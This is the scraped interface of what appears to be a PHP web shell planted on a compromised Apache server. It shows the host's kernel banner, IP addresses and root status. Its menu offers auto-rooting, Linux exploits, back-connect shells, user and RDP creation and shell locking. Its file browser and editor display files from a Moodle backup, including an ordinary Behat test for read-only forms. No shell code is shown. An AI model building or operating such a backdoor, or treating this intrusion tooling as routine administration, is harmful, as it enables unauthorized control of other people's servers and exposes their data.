Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
lib /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
action_menu.feature
1.14
KB
-rw-rw-r--
alpha_chooser.feature
21.56
KB
-rw-rw-r--
behat_action_menu.php
3.16
KB
-rw-rw-r--
behat_data_generators.php
29.19
KB
-rw-rw-r--
behat_deprecated.php
4.69
KB
-rw-rw-r--
behat_filters.php
2.95
KB
-rw-rw-r--
behat_forms.php
21.45
KB
-rw-rw-r--
behat_general.php
74.59
KB
-rw-rw-r--
behat_hooks.php
25.6
KB
-rw-rw-r--
behat_navigation.php
25.91
KB
-rw-rw-r--
behat_permissions.php
10.3
KB
-rw-rw-r--
behat_transformations.php
5.93
KB
-rw-rw-r--
largeforms.feature
4.46
KB
-rw-rw-r--
readonlyform.feature
1.64
KB
-rw-rw-r--
timezone.feature
438
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readonlyform.feature
@core Feature: Read-only forms should work In order to use certain forms on large Moodle installations As a user Relevant featuers of non-editable forms should still work @javascript Scenario: Shortforms expand collapsing should work for read-only forms - one-section form Given the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "activities" exist: | activity | name | intro | course | idnumber | | label | L1 | <a href="../lib/tests/fixtures/readonlyform.php?sections=1">Fixture link</a> | C1 | label1 | And I log in as "admin" And I am on "Course 1" course homepage And I follow "Fixture link" When I expand all fieldsets Then the field "Name" matches value "Important information" @javascript Scenario: Shortforms expand collapsing should work for read-only forms - two-section form Given the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "activities" exist: | activity | name | intro | course | idnumber | | label | L1 | <a href="../lib/tests/fixtures/readonlyform.php?sections=2">Fixture link</a> | C1 | label1 | And I log in as "admin" And I am on "Course 1" course homepage And I follow "Fixture link" When I expand all fieldsets Then the field "Name" matches value "Important information" Then the field "Other" matches value "Other information"
Close